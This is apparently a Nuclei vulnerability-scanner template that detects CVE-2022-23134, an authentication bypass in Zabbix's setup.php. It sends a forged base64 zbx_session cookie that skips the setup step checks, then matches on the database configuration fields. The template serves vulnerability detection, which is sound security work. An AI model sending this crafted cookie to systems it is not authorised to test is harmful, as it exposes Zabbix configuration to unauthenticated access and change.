54 lines
2.0 KiB
YAML
54 lines
2.0 KiB
YAML
id: CVE-2022-23134
|
|
|
|
info:
|
|
name: Zabbix Setup Configuration Authentication Bypass
|
|
author: bananabr
|
|
severity: medium
|
|
description: After the initial setup process, some steps of setup.php file are reachable not only by super-administrators but also by unauthenticated users. A malicious actor can pass step checks and potentially change the configuration of Zabbix Frontend.
|
|
remediation: |
|
|
Apply the latest security patches or updates provided by Zabbix to fix the authentication bypass vulnerability.
|
|
reference:
|
|
- https://blog.sonarsource.com/zabbix-case-study-of-unsafe-session-storage
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-23134
|
|
- https://support.zabbix.com/browse/ZBX-20384
|
|
- https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6SZYHXINBKCY42ITFSNCYE7KCSF33VRA/
|
|
- https://lists.debian.org/debian-lts-announce/2022/02/msg00008.html
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
|
|
cvss-score: 5.3
|
|
cve-id: CVE-2022-23134
|
|
cwe-id: CWE-287,CWE-284
|
|
epss-score: 0.19245
|
|
epss-percentile: 0.95745
|
|
cpe: cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 2
|
|
vendor: zabbix
|
|
product: zabbix
|
|
tags: cve,cve2022,zabbix,auth-bypass,kev
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/zabbix/setup.php"
|
|
- "{{BaseURL}}/setup.php"
|
|
|
|
stop-at-first-match: true
|
|
|
|
headers:
|
|
Cookie: "zbx_session=eyJzZXNzaW9uaWQiOiJJTlZBTElEIiwiY2hlY2tfZmllbGRzX3Jlc3VsdCI6dHJ1ZSwic3RlcCI6Niwic2VydmVyQ2hlY2tSZXN1bHQiOnRydWUsInNlcnZlckNoZWNrVGltZSI6MTY0NTEyMzcwNCwic2lnbiI6IklOVkFMSUQifQ%3D%3D"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- "Database"
|
|
- "host"
|
|
- "port"
|
|
- "Zabbix"
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a00473045022049601017a9a46def1890564862b491e34e90a81d57888c59745e3ac2ae33dd2c022100de8ea4d8c717a2b1d5045ac231f37e371dddf7537b20d780addc8591f54f2859:922c64590222798bb761d5b6d8e72950 |